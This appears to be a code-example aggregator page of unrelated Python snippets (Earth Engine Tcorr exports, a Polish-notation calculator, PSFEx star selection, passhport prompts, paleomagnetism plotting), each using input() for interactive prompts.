    logging.debug('  Collection: {}'.format(tmax_coll_id))
    logging.debug('  Source:  {}'.format(tmax_source))
    logging.debug('  Version: {}'.format(tmax_version))

    logging.debug('\nExport properties')
    export_info = utils.get_info(ee.Image(tmax_mask))
    if 'daymet' in tmax_name.lower():
        # Custom smaller extent for DAYMET focused on CONUS
        export_extent = [-1999750, -1890500, 2500250, 1109500]
        export_shape = [4500, 3000]
        export_geo = [1000, 0, -1999750, 0, -1000, 1109500]
        # Custom medium extent for DAYMET of CONUS, Mexico, and southern Canada
        # export_extent = [-2099750, -3090500, 2900250, 1909500]
        # export_shape = [5000, 5000]
        # export_geo = [1000, 0, -2099750, 0, -1000, 1909500]
        export_crs = export_info['bands'][0]['crs']
    else:
        export_crs = export_info['bands'][0]['crs']
        export_geo = export_info['bands'][0]['crs_transform']
        export_shape = export_info['bands'][0]['dimensions']
        # export_geo = ee.Image(tmax_mask).projection().getInfo()['transform']
        # export_crs = ee.Image(tmax_mask).projection().getInfo()['crs']
        # export_shape = ee.Image(tmax_mask).getInfo()['bands'][0]['dimensions']
        export_extent = [
            export_geo[2], export_geo[5] + export_shape[1] * export_geo[4],
            export_geo[2] + export_shape[0] * export_geo[0], export_geo[5]
        ]
    export_geom = ee.Geometry.Rectangle(export_extent,
                                        proj=export_crs,
                                        geodesic=False)
    logging.debug('  CRS: {}'.format(export_crs))
    logging.debug('  Extent: {}'.format(export_extent))
    logging.debug('  Geo: {}'.format(export_geo))
    logging.debug('  Shape: {}'.format(export_shape))

    if study_area_extent is None:
        if 'daymet' in tmax_name.lower():
            # CGM - For now force DAYMET to a slightly smaller "CONUS" extent
            study_area_extent = [-125, 25, -65, 49]
            # study_area_extent =  [-125, 25, -65, 52]
        elif 'cimis' in tmax_name.lower():
            study_area_extent = [-124, 35, -119, 42]
        else:
            # TODO: Make sure output from bounds is in WGS84
            study_area_extent = tmax_mask.geometry().bounds().getInfo()
        logging.debug(f'\nStudy area extent not set in INI, '
                      f'default to {study_area_extent}')
    study_area_geom = ee.Geometry.Rectangle(study_area_extent,
                                            proj='EPSG:4326',
                                            geodesic=False)

    # For now define the study area from an extent
    if study_area_extent:
        study_area_geom = ee.Geometry.Rectangle(study_area_extent,
                                                proj='EPSG:4326',
                                                geodesic=False)
        export_geom = export_geom.intersection(study_area_geom, 1)
        # logging.debug('  Extent: {}'.format(export_geom.bounds().getInfo()))

    # If cell_size parameter is set in the INI,
    # adjust the output cellsize and recompute the transform and shape
    try:
        export_cs = float(ini['EXPORT']['cell_size'])
        export_shape = [
            int(math.ceil(abs((export_shape[0] * export_geo[0]) / export_cs))),
            int(math.ceil(abs((export_shape[1] * export_geo[4]) / export_cs)))
        ]
        export_geo = [
            export_cs, 0.0, export_geo[2], 0.0, -export_cs, export_geo[5]
        ]
        logging.debug('  Custom export cell size: {}'.format(export_cs))
        logging.debug('  Geo: {}'.format(export_geo))
        logging.debug('  Shape: {}'.format(export_shape))
    except KeyError:
        pass

    if not ee.data.getInfo(tcorr_scene_coll_id):
        logging.info('\nExport collection does not exist and will be built'
                     '\n  {}'.format(tcorr_scene_coll_id))
        input('Press ENTER to continue')
        ee.data.createAsset({'type': 'IMAGE_COLLECTION'}, tcorr_scene_coll_id)

    # Get current asset list
    logging.debug('\nGetting GEE asset list')
    asset_list = utils.get_ee_assets(tcorr_scene_coll_id)
    # if logging.getLogger().getEffectiveLevel() == logging.DEBUG:
    #     pprint.pprint(asset_list[:10])

    # Get current running tasks
    tasks = utils.get_ee_tasks()
    if logging.getLogger().getEffectiveLevel() == logging.DEBUG:
        logging.debug('  Tasks: {}\n'.format(len(tasks)))
        input('ENTER')

    # TODO: Decide if month and year lists should be applied to scene exports
    # # Limit by year and month
    # try:
    #     month_list = sorted(list(utils.parse_int_set(ini['TCORR']['months'])))
    # except:
    #     logging.info('\nTCORR "months" parameter not set in the INI,'
    #                  '\n  Defaulting to all months (1-12)\n')
    #     month_list = list(range(1, 13))
    # try:
    #     year_list = sorted(list(utils.parse_int_set(ini['TCORR']['years'])))
    # except:
    #     logging.info('\nTCORR "years" parameter not set in the INI,'
    #                  '\n  Defaulting to all available years\n')
    #     year_list = []

    if cron_flag:
        # CGM - This seems like a silly way of getting the date as a datetime
        #   Why am I doing this and not using the commented out line?
        end_dt = datetime.date.today().strftime('%Y-%m-%d')
        end_dt = datetime.datetime.strptime(end_dt, '%Y-%m-%d')
        end_dt = end_dt + datetime.timedelta(days=-4)
        # end_dt = datetime.datetime.today() + datetime.timedelta(days=-1)
        start_dt = end_dt + datetime.timedelta(days=-64)
    else:
        start_dt = datetime.datetime.strptime(ini['INPUTS']['start_date'],
                                              '%Y-%m-%d')
        end_dt = datetime.datetime.strptime(ini['INPUTS']['end_date'],
                                            '%Y-%m-%d')
    if end_dt >= datetime.datetime.today():
        logging.debug('End Date:   {} - setting end date to current '
                      'date'.format(end_dt.strftime('%Y-%m-%d')))
        end_dt = datetime.datetime.today()
    if start_dt < datetime.datetime(1984, 3, 23):
        logging.debug('Start Date: {} - no Landsat 5+ images before '
                      '1984-03-23'.format(start_dt.strftime('%Y-%m-%d')))
        start_dt = datetime.datetime(1984, 3, 23)
    start_date = start_dt.strftime('%Y-%m-%d')
    end_date = end_dt.strftime('%Y-%m-%d')
    # next_date = (start_dt + datetime.timedelta(days=1)).strftime('%Y-%m-%d')
    logging.debug('Start Date: {}'.format(start_date))
    logging.debug('End Date:   {}\n'.format(end_date))
    if start_dt > end_dt:
        raise ValueError('start date must be before end date')

    # Get the list of WRS2 tiles that intersect the data area and study area
    wrs2_coll = ee.FeatureCollection(wrs2_coll_id) \
        .filterBounds(export_geom) \
        .filterBounds(study_area_geom)
    if wrs2_tiles:
        wrs2_coll = wrs2_coll.filter(
            ee.Filter.inList(wrs2_tile_field, wrs2_tiles))
    wrs2_info = wrs2_coll.getInfo()['features']
    # pprint.pprint(wrs2_info)
    # input('ENTER')

    # Iterate over WRS2 tiles (default is from west to east)
    for wrs2_ftr in sorted(wrs2_info,
                           key=lambda k: k['properties']['WRS2_TILE'],
                           reverse=not (reverse_flag)):
        wrs2_tile = wrs2_ftr['properties'][wrs2_tile_field]
        logging.info('{}'.format(wrs2_tile))

        wrs2_path = int(wrs2_tile[1:4])
        wrs2_row = int(wrs2_tile[5:8])
        # wrs2_path = wrs2_ftr['properties']['PATH']
        # wrs2_row = wrs2_ftr['properties']['ROW']

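        # Restrict each Landsat collection to the current WRS2 path/row using
        # metadata equality filters.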
        wrs2_filter = [{
            'type': 'equals',
            'leftField': 'WRS_PATH',
            'rightValue': wrs2_path
        }, {
            'type': 'equals',
            'leftField': 'WRS_ROW',
            'rightValue': wrs2_row
        }]
        filter_args = {c: wrs2_filter for c in collections}

        # Build and merge the Landsat collections
        model_obj = ssebop.Collection(
            collections=collections,
            start_date=start_date,
            end_date=end_date,
            cloud_cover_max=cloud_cover,
            geometry=ee.Geometry(wrs2_ftr['geometry']),
            model_args=model_args,
            filter_args=filter_args,
        )
        landsat_coll = model_obj.overpass(variables=['ndvi'])
        # pprint.pprint(landsat_coll.aggregate_array('system:id').getInfo())
        # input('ENTER')

        try:
            image_id_list = landsat_coll.aggregate_array('system:id').getInfo()
        except Exception as e:
            logging.warning('  Error getting image ID list, skipping tile')
            logging.debug(f'  {e}')
            continue

        if update_flag:
            assets_info = utils.get_info(
                ee.ImageCollection(tcorr_scene_coll_id).filterMetadata(
                    'wrs2_tile', 'equals',
                    wrs2_tile).filterDate(start_date, end_date))
            asset_props = {
                f'{tcorr_scene_coll_id}/{x["properties"]["system:index"]}':
                x['properties']
                for x in assets_info['features']
            }
        else:
            asset_props = {}

        # Sort by date
        for image_id in sorted(image_id_list,
                               key=lambda k: k.split('/')[-1].split('_')[-1],
                               reverse=reverse_flag):
            coll_id, scene_id = image_id.rsplit('/', 1)
            logging.info(f'{scene_id}')

            export_dt = datetime.datetime.strptime(
                scene_id.split('_')[-1], '%Y%m%d')
            export_date = export_dt.strftime('%Y-%m-%d')
            # next_date = (export_dt + datetime.timedelta(days=1)).strftime('%Y-%m-%d')

            # # Uncomment to apply month and year list filtering
            # if month_list and export_dt.month not in month_list:
            #     logging.debug(f'  Date: {export_date} - month not in INI - skipping')
            #     continue
            # elif year_list and export_dt.year not in year_list:
            #     logging.debug(f'  Date: {export_date} - year not in INI - skipping')
            #     continue

            logging.debug(f'  Date: {export_date}')

            export_id = export_id_fmt.format(product=tmax_name.lower(),
                                             scene_id=scene_id)
            logging.debug(f'  Export ID: {export_id}')

            asset_id = asset_id_fmt.format(coll_id=tcorr_scene_coll_id,
                                           scene_id=scene_id)
            logging.debug(f'  Asset ID: {asset_id}')

            if update_flag:

                def version_number(version_str):
                    return list(map(int, version_str.split('.')))

                if export_id in tasks.keys():
                    logging.info('  Task already submitted, skipping')
                    continue
                # In update mode only overwrite if the version is old
                if asset_props and asset_id in asset_props.keys():
                    model_ver = version_number(ssebop.__version__)
                    asset_ver = version_number(
                        asset_props[asset_id]['model_version'])

                    if asset_ver < model_ver:
                        logging.info('  Asset model version is old, removing')
                        try:
                            ee.data.deleteAsset(asset_id)
                        except:
                            logging.info('  Error removing asset, skipping')
                            continue
                    else:
                        logging.info('  Asset is up to date, skipping')
                        continue
            elif overwrite_flag:
                if export_id in tasks.keys():
                    logging.debug('  Task already submitted, cancelling')
                    ee.data.cancelTask(tasks[export_id]['id'])
                # This is intentionally not an "elif" so that a task can be
                # cancelled and an existing image/file/asset can be removed
                if asset_id in asset_list:
                    logging.debug('  Asset already exists, removing')
                    ee.data.deleteAsset(asset_id)
            else:
                if export_id in tasks.keys():
                    logging.debug('  Task already submitted, exiting')
                    continue
                elif asset_id in asset_list:
                    logging.debug('  Asset already exists, skipping')
                    continue

            image = ee.Image(image_id)
            # TODO: Will need to be changed for SR or use from_image_id()
            t_obj = ssebop.Image.from_landsat_c1_toa(image_id, **model_args)
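            # tcorr_stats may be missing keys for scenes with no valid pixels;
            # combine() with overwrite=False fills in defaults of 0 without
            # clobbering computed values.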
            t_stats = ee.Dictionary(t_obj.tcorr_stats) \
                .combine({'tcorr_p5': 0, 'tcorr_count': 0}, overwrite=False)
            tcorr = ee.Number(t_stats.get('tcorr_p5'))
            count = ee.Number(t_stats.get('tcorr_count'))
            index = ee.Algorithms.If(count.gte(min_pixel_count), 0, 9)

            # Write an empty image if the pixel count is too low
            tcorr_img = ee.Algorithms.If(count.gte(min_pixel_count),
                                         tmax_mask.add(tcorr),
                                         tmax_mask.updateMask(0))

            # Clip to the Landsat image footprint
            output_img = ee.Image(tcorr_img).clip(image.geometry())

            # Clear the transparency mask
            output_img = output_img.updateMask(output_img.unmask(0)) \
                .rename(['tcorr']) \
                .set({
                    'CLOUD_COVER': image.get('CLOUD_COVER'),
                    'CLOUD_COVER_LAND': image.get('CLOUD_COVER_LAND'),
                    # 'SPACECRAFT_ID': image.get('SPACECRAFT_ID'),
                    'coll_id': coll_id,
                    'date_ingested': datetime.datetime.today().strftime('%Y-%m-%d'),
                    'date': export_dt.strftime('%Y-%m-%d'),
                    'doy': int(export_dt.strftime('%j')),
                    'image_id': image_id,
                    'model_name': model_name,
                    'model_version': ssebop.__version__,
                    'month': int(export_dt.month),
                    'scene_id': scene_id,
                    'system:time_start': image.get('system:time_start'),
                    'tcorr_value': tcorr,
                    'tcorr_index': index,
                    'tcorr_pixel_count': count,
                    'tmax_source': tmax_source.upper(),
                    'tmax_version': tmax_version.upper(),
                    'wrs2_path': wrs2_path,
                    'wrs2_row': wrs2_row,
                    'wrs2_tile': wrs2_tile,
                    'year': int(export_dt.year),
                })
            # pprint.pprint(output_img.getInfo()['properties'])
            # input('ENTER')

            logging.debug('  Building export task')
            task = ee.batch.Export.image.toAsset(
                image=output_img,
                description=export_id,
                assetId=asset_id,
                crs=export_crs,
                crsTransform='[' + ','.join(list(map(str, export_geo))) + ']',
                dimensions='{0}x{1}'.format(*export_shape),
            )

            logging.info('  Starting export task')
            utils.ee_task_start(task)

        # Pause before starting the next date (not export task)
        utils.delay_task(delay_time, max_ready)
        logging.debug('')
Example #52
    elif (oprt == 2): #multiplication
        return val1 * val2
    elif (oprt == 3): #divide
        return val1 / val2
    else :
        print("value not operator..")
        return -1
#-------------------------MAIN CODE---------------------------------------------------
Lifo = []                                                                       # operator stack
Fifo = []                                                                       # operator queue
generalList = []                                                                # tokens of the polish notation
operandList = []                                                                # operands waiting to be processed
lastOperand = ''                                                                # last operator seen
result = -1

notasyon = input("Enter Polish Notation :")                                     # read the notation string
generalList = notasyon.split(" ")                                               # split the notation into tokens

isFine = False                                                                  # has an operator been seen yet?
lastOperand = ""

for i in generalList :
    if(isOperator(i)):                                                          #is operator
        isFine=True
        lastOperand=i
        Lifo.append(i)
    elif(isOperator(i)==False):
        operandList.append(int(i))
        if(len(operandList)==2 ):
            if(isFine):
                result = doIt(Lifo[len(Lifo)-1],operandList[0],operandList[1])
Example #53
    # Store the information
    configuration_1.store_mpc_data()

    # Set initial condition constraint for the next iteration
    configuration_1.prepare_next_iter()
    """
    ------------------------------------------------------
    do-mpc: Plot MPC animation if chosen by the user
    ------------------------------------------------------
    """
    # Plot animation if chosen in by the user
    #data_do_mpc.plot_animation(configuration_1)
    count = count + 1
    print("dist:", dist(configuration_1.simulator.xf_sim, Y_ref))
    if dist(configuration_1.simulator.xf_sim, Y_ref)<=5:
        break

"""
------------------------------------------------------
do-mpc: Plot the closed-loop results
------------------------------------------------------
"""
plt.show()
#data_do_mpc.plot_mpc(configuration_1)

# Export to matlab if wanted
#data_do_mpc.export_to_matlab(configuration_1)
print("count: ", count)

input("Press Enter to exit do-mpc...")
Example #54
def select_candidates(set,
                      prefs,
                      frmin,
                      frmax,
                      flags,
                      flux,
                      fluxerr,
                      rmsSize,
                      elong,
                      vignet,
                      plot=dict(),
                      title=""):
    maxbad = prefs.getBadpixNmax()
    maxbadflag = prefs.getBadpixFlag()
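    # Convert the maximum allowed ellipticity e into a maximum elongation
    # a/b = (1 + e) / (1 - e); e >= 1 would be unbounded, so cap at 100.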
    maxelong = (prefs.getMaxellip() + 1.0) / (
        1.0 - prefs.getMaxellip()) if prefs.getMaxellip() < 1.0 else 100.0
    minsn = prefs.getMinsn()

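    # Signal-to-noise ratio; sources with non-positive flux errors get a large
    # negative sentinel so the S/N cut below rejects them.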
    sn = flux / np.where(fluxerr > 0, fluxerr, 1)
    sn[fluxerr <= 0] = -psfexLib.BIG
    #---- Apply some selection over flags, fluxes...
    plotFlags = plot.get("showFlags") if plt else False
    plotRejection = plot.get("showRejection") if plt else False

    bad = flags & prefs.getFlagMask() != 0
    set.setBadFlags(int(sum(bad != 0)))

    if plotRejection:
        selectionVectors = []
        selectionVectors.append((bad, "flags %d" % sum(bad != 0)))

    dbad = sn < minsn
    set.setBadSN(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "S/N %d" % sum(dbad)))

    dbad = rmsSize < frmin
    set.setBadFrmin(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "frmin %d" % sum(dbad)))

    dbad = rmsSize > frmax
    set.setBadFrmax(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "frmax %d" % sum(dbad)))

    dbad = elong > maxelong
    set.setBadElong(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "elong %d" % sum(dbad)))

    #-- ... and check the integrity of the sample
    if maxbadflag:
        nbad = np.array([(v <= -psfexLib.BIG).sum() for v in vignet])
        dbad = nbad > maxbad
        set.setBadPix(int(sum(dbad)))
        bad = np.logical_or(bad, dbad)
        if plotRejection:
            selectionVectors.append((dbad, "badpix %d" % sum(dbad)))

    good = np.logical_not(bad)
    if plotFlags or plotRejection:
        imag = -2.5 * np.log10(flux)
        plt.clf()

        alpha = 0.5
        if plotFlags:
            labels = getFlags()

            isSet = np.where(flags == 0x0)[0]
            plt.plot(imag[isSet],
                     rmsSize[isSet],
                     'o',
                     alpha=alpha,
                     label="good")

            for i in range(16):
                mask = 1 << i
                if mask & prefs.getFlagMask():
                    isSet = np.where(np.bitwise_and(flags, mask))[0]
                    if isSet.any():
                        plt.plot(imag[isSet],
                                 rmsSize[isSet],
                                 'o',
                                 alpha=alpha,
                                 label=labels[mask])
        else:
            for bad, label in selectionVectors:
                plt.plot(imag[bad],
                         rmsSize[bad],
                         'o',
                         alpha=alpha,
                         label=label)

        plt.plot(imag[good],
                 rmsSize[good],
                 'o',
                 color="black",
                 label="selected")
        [plt.axhline(_, color='red') for _ in [frmin, frmax]]
        plt.xlim(np.median(imag[good]) + 5 * np.array([-1, 1]))
        plt.ylim(-0.1, 2 * frmax)
        plt.legend(loc=2)
        plt.xlabel("Instrumental Magnitude")
        plt.ylabel("rmsSize")
        plt.title("%s %d selected" % (title, sum(good)))

        input("Continue? ")

    return good
Example #55
File: target.py Project: phlb/passhport
def prompt_rmusergroup():
    """Prompt user to obtain data to remove a usergroup"""
    usergroupname = input("Usergroupname: ")
    targetname = input("Targetname: ")

    return {"<usergroupname>": usergroupname, "<targetname>": targetname}
Example #56
def main():
    global start
    parser = OptionParser()
    #parser.add_option("-f", "--file", dest="filename",
    #                  help="write report to FILE", metavar="FILE")
    parser.add_option("-O", "--output", dest="output", default = "none",
                          help="Set output TYPE: xml|hash", metavar="TYPE")
    parser.add_option("--start", dest="start", default = None,
                          help="Set start block", metavar="STMT")
    parser.add_option("-q", "--quiet",
                    action="store_false", dest="verbose", default=True,
                    help="don't print status messages to stdout")

    parser.add_option("--optdebug",
                    action="store_true", dest="optdebug", default=False,
                    help="debug optparse module")

    parser.add_option("--debug",
                    action="store_true", dest="debug", default=False,
                    help="prints lots of useless messages")


    (options, args) = parser.parse_args()
    if options.optdebug:
        print(options, args)
    if options.start:
        start = options.start
        print("Start set to:", start)




    def do_it():
        if options.output == "none": return
        tree_data = calctree(prog)
        if options.output == "hash":
            printtree(tree_data, mode = "hash")
        elif options.output == "xml":
            printtree(tree_data, mode = "xml")
        elif options.output == "file":
            f1_hash = open(filename+".hash","w")
            printtree(tree_data, mode = "hash", output = f1_hash)
            f1_hash.close()

            f1_xml = open(filename+".xml","w")
            printtree(tree_data, mode = "xml", output = f1_xml)
            f1_xml.close()
        elif options.output == "yaml":
            import yaml
            print(yaml.dump(tree_data['content']))

        else:
            print("Unknown outputmode", options.output)

    prog = "$$$"
    if len(args) > 0 :
        for filename in args:
            fs = filename.split("/")
            sys.stderr.write("Loading %s ..." % fs[-1])
            sys.stderr.flush()
            data = open(filename).read()
            sys.stderr.write(" parsing ...")
            sys.stderr.flush()
            prog = parse(data)
            sys.stderr.write(" formatting ...")
            sys.stderr.flush()
            if prog: do_it()
            sys.stderr.write(" Done.\n")
            sys.stderr.flush()

    else:


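        # Interactive mode: read lines from the prompt; lines starting with '#'
        # are meta-commands (#setstart <block>, #parse), anything else is
        # buffered until EOF and then parsed.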
        line = ""
        while 1:
            try:
                line1 = input("flscript> ")
                if line1.startswith("#"):
                    comm = line1[1:].split(" ")
                    if comm[0] == "setstart":
                        start = comm[1]
                        print("Start set to:", start)
                    if comm[0] == "parse":
                        print()
                        prog = parse(line)
                        line = ""
                else:
                    line += line1
            except EOFError:
                break
            line += "\n"
        print()
        prog = parse(line)
        do_it()
Example #57
##viewer1 = Grid3DPyxViewer(var, zvalue = 1.0)
##viewer3 = Grid3DPyxViewer(var, zvalue = 3.0)
##viewer5 = Grid3DPyxViewer(var, zvalue = 5.0)
##viewer7 = Grid3DPyxViewer(var, zvalue = 7.0)
##viewer9 = Grid3DPyxViewer(var, zvalue = 9.0)

## viewer = Viewer(vars = var)

## viewer.plot()

var.constrain(valueSides, mesh.facesLeft)
var.constrain(valueSides, mesh.facesRight)
var.constrain(valueSides, mesh.facesTop)
var.constrain(valueSides, mesh.facesBottom)
var.constrain(valueFront, mesh.facesFront)
var.constrain(valueBack, mesh.facesBack)

## viewer.plot()

if __name__ == '__main__':
    ##viewer1.plot(resolution = 0.2, xlabel = "X values (Z value = 1)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer3.plot(resolution = 0.2, xlabel = "X values (Z value = 3)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer5.plot(resolution = 0.2, xlabel = "X values (Z value = 5)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer7.plot(resolution = 0.2, xlabel = "X values (Z value = 7)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer9.plot(resolution = 0.2, xlabel = "X values (Z value = 9)", minval = valueFront, maxval = valueBack)
    input("finished")
Example #58
File: target.py Project: phlb/passhport
def prompt_checkaccess():
    """Prompt a pattern to search targets and check access"""
    pattern = input("Pattern used to search the targets to test:")

    return {"<pattern>": pattern}
Example #59
def main():
    """
    NAME
        lowrie.py

    DESCRIPTION
       plots intensity decay curves for Lowrie experiments

    SYNTAX
        lowrie -h [command line options]

    INPUT
       takes SIO formatted input files

    OPTIONS
        -h prints help message and quits
        -f FILE: specify input file
        -N do not normalize by maximum magnetization
        -fmt [svg, pdf, eps, png] specify fmt, default is svg
        -sav save plots and quit
    """
    fmt, plot = 'svg', 0
    FIG = {}  # plot dictionary
    FIG['lowrie'] = 1  # demag is figure 1
    pmagplotlib.plot_init(FIG['lowrie'], 6, 6)
    norm = 1  # default is to normalize by maximum axis
    if len(sys.argv) > 1:
        if '-h' in sys.argv:
            print(main.__doc__)
            sys.exit()
        if '-N' in sys.argv:
            norm = 0  # don't normalize
        if '-sav' in sys.argv:
            plot = 1  # save plots and quit (no interactive display)
        if '-fmt' in sys.argv:  # sets the output format
            ind = sys.argv.index("-fmt")
            fmt = sys.argv[ind + 1]
        if '-f' in sys.argv:  # sets input filename
            ind = sys.argv.index("-f")
            in_file = sys.argv[ind + 1]
        else:
            print(main.__doc__)
            print('you must supply a file name')
            sys.exit()
    else:
        print(main.__doc__)
        print('you must supply a file name')
        sys.exit()
    data = pmag.open_file(in_file)
    PmagRecs = []  # set up a list for the results
    keys = ['specimen', 'treatment', 'csd', 'M', 'dec', 'inc']
    for line in data:
        PmagRec = {}
        rec = line.replace('\n', '').split()
        for k in range(len(keys)):
            PmagRec[keys[k]] = rec[k]
        PmagRecs.append(PmagRec)
    specs = pmag.get_dictkey(PmagRecs, 'specimen', '')
    sids = []
    for spec in specs:
        if spec not in sids:
            sids.append(spec)  # get list of unique specimen names
    for spc in sids:  # step through the specimen names
        pmagplotlib.plot_init(FIG['lowrie'], 6, 6)
        print(spc)
        specdata = pmag.get_dictitem(PmagRecs, 'specimen', spc,
                                     'T')  # get all this one's data
        DIMs, Temps = [], []
        for dat in specdata:  # step through the data
            DIMs.append(
                [float(dat['dec']),
                 float(dat['inc']),
                 float(dat['M']) * 1e-3])
            Temps.append(float(dat['treatment']))
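        # Convert the (dec, inc, moment) triples to cartesian components;
        # carts[0], carts[1], carts[2] are then x, y, z versus temperature.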
        carts = pmag.dir2cart(DIMs).transpose()
        # if norm==1: # want to normalize
        #    nrm=max(max(abs(carts[0])),max(abs(carts[1])),max(abs(carts[2]))) # by maximum of x,y,z values
        #    ylab="M/M_max"
        if norm == 1:  # want to normalize
            nrm = (DIMs[0][2])  # normalize by NRM
            ylab = "M/M_o"
        else:
            nrm = 1.  # don't normalize
            ylab = "Magnetic moment (Am^2)"
        xlab = "Temperature (C)"
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[0]), nrm),
                            sym='r-')
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[0]), nrm),
                            sym='ro')  # X direction
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[1]), nrm),
                            sym='c-')
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[1]), nrm),
                            sym='cs')  # Y direction
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[2]), nrm),
                            sym='k-')
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[2]), nrm),
                            sym='k^',
                            title=spc,
                            xlab=xlab,
                            ylab=ylab)  # Z direction
        files = {'lowrie': 'lowrie:_' + spc + '_.' + fmt}
        if plot == 0:
            pmagplotlib.draw_figs(FIG)
            ans = input('S[a]ve figure? [q]uit, <return> to continue   ')
            if ans == 'a':
                pmagplotlib.save_plots(FIG, files)
            elif ans == 'q':
                sys.exit()
        else:
            pmagplotlib.save_plots(FIG, files)
        pmagplotlib.clearFIG(FIG['lowrie'])
Example #60
File: target.py Project: phlb/passhport
def prompt_adduser():
    """Prompt user to obtain data to add a user"""
    username = input("Username: ")
    targetname = input("Targetname: ")

    return {"<username>": username, "<targetname>": targetname}